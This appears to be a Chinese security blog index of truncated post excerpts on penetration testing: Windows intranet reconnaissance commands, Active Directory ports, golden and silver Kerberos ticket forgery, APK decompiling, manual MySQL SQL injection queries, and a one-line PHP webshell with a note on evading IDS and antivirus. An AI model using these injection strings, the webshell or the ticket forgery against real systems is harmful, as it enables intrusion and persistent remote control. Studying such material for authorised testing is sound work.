摘要:
内网信息收集 windows 1、检查当前shell权限 whoami /user && whoami /priv 2、查看系统信息 systeminfo 3、tcp/udp网络连接状态 netstat -ano 4、机器名 hostname 5、查看当前操作系统 ver 6、查杀软 wmic /N 阅读全文
摘要:
内网渗透常用端口 53 DNS服务,在使用中需要用到TCP/UDP 53端口,AD域的核心就是DNS服务器,AD通过DNS服务器定位资源 88 Kerberos服务,在使用中需要用到TCP/UDP 88端口,Kerberos密钥分发中心(KDC) 在该端口上侦听Ticket请求 135 135端口主 阅读全文
摘要:
域渗透之金票据学习 金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。 krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x01金票据利用条件 域控中krbtgt账户NTLM密码哈希 阅读全文
摘要:
内网渗透测试之域渗透详解 在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。 通常,我们是以获得域控制 阅读全文
摘要:
域渗透之银票据学习 银票据(silver ticket):它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。 0x01 银票据利用条件 域控计算机账户的ntlm hash 域中的sid值 一台域中主机 与其说是一种 阅读全文
摘要:
术语 工作组:工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的computer按照不同的要求分类到不同的组 域:用来描述一种架构,和“工作组”相对应,由工作组升级而来的高级架构,域 (Domain)是一个有安全边界的计算机集合( 安全边界,意思是在两 阅读全文
摘要:
Linux下反编译Android apk文件 工具 反编译过程中需要用到三个工具:apktool、dex2jar和jd-Gui。 apktool:反编译出apk所需要的资源文件和布局设置文件。 dex2jar:反编译出jar文件,即apk的源程序字节码 jd-GUI:查看dex2jar反编译出来的j 阅读全文
摘要:
windows截屏 PSR(Problem Steps Recorder),直译为问题步骤记录器,在Windows 早期的系统中,采用WER(Windows Error Reporting)来收集系统的错误报告,但这些报告往往包含的信息太少以致于无法解决实际问题。 为此,微软从Windows 7系统 阅读全文
摘要:
sql手工注入 mysql #当前数据库库名,用户名 union select database(), user() #找所有数据库库名 select+schema_name+from+information_schema.schemata limit 1,1; #找一个数据库库中有哪些表名 sel 阅读全文
摘要:
webshell php <?php echo shell_exec($_GET['cmd']);?> 中国菜刀 可能被IDS WAF AV 扫描器 查杀 WeBoCoo(Web Backdoor Cookie)-->php 类终端shell 通信使用cookie传输 `服务端生成` webacoo 阅读全文